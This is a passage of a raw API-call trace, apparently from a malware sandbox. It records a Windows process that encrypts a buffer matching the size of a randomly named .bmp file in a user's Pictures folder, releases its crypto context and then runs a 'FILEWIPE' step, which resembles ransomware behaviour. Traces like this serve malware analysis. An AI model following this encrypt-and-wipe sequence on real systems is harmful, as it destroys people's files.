wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0040.664] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0040.664] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.664] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.664] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.664] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0040.664] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.664] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.664] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0040.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0040.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0040.664] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.664] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0040.664] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0040.664] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0040.664] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.664] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0040.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0040.665] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0040.665] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0040.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0040.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0040.665] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.665] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.665] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.665] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0040.665] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.665] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0040.665] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0040.665] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.666] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0xe4ad, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0xe4b0) returned 1 [0040.666] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.666] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0040.666] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.666] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.666] CharLowerBuffW (in: lpsz="byte[58545]", cchLength=0xb | out: lpsz="byte[58545]") returned 0xb [0040.666] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.668] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.668] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.668] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0040.668] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.668] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x9434c0*, pdwDataLen=0x6ae220*=0xe4ad, dwBufLen=0xe4b0 | out: pbData=0x9434c0*, pdwDataLen=0x6ae220*=0xe4b0) returned 1 [0040.669] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.669] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0040.669] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.670] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.670] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.670] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.671] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0040.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0040.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.671] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.671] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0040.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.671] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0040.671] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0040.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0040.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0040.671] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.671] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.671] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0040.671] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0040.671] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0040.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0040.671] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.675] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.675] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0040.675] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.678] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.678] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.678] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0040.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.678] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0040.678] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0040.679] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0040.679] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.679] CryptDestroyKey (hKey=0x7c21c0) returned 1 [0040.679] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0040.679] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0040.679] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0040.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0040.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0040.679] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0040.679] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0040.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0040.679] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0040.679] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0040.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0040.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0040.679] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0040.679] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0040.679] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0040.680] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0040.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0040.680] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0040.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0040.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0040.680] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0040.680] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0040.680] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.680] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0040.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0040.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.680] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.680] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0040.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.680] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.680] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0040.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0040.680] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.681] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.681] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.681] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0040.681] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0040.681] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.681] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.681] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.681] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0040.681] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0040.681] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0040.681] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0040.681] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0040.681] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0040.681] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.681] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0040.681] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.681] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.681] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.681] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.681] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0040.681] FreeLibrary (hLibModule=0x754b0000) returned 1 [0040.681] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0040.681] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0040.681] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.681] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0040.681] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.681] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0040.682] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0040.682] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.682] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.682] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.683] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.683] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0040.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0040.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0040.683] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.683] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.683] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\D_O37vI.bmp", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3ee1130, ftCreationTime.dwHighDateTime=0x1d5c22e, ftLastAccessTime.dwLowDateTime=0xff7d9b90, ftLastAccessTime.dwHighDateTime=0x1d5bf92, ftLastWriteTime.dwLowDateTime=0xff7d9b90, ftLastWriteTime.dwHighDateTime=0x1d5bf92, nFileSizeHigh=0x0, nFileSizeLow=0xe4ad, dwReserved0=0x0, dwReserved1=0x777648, cFileName="D_O37vI.bmp", cAlternateFileName="")) returned 0x7c2240 [0040.683] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0040.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0040.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0040.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0040.683] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0040.683] 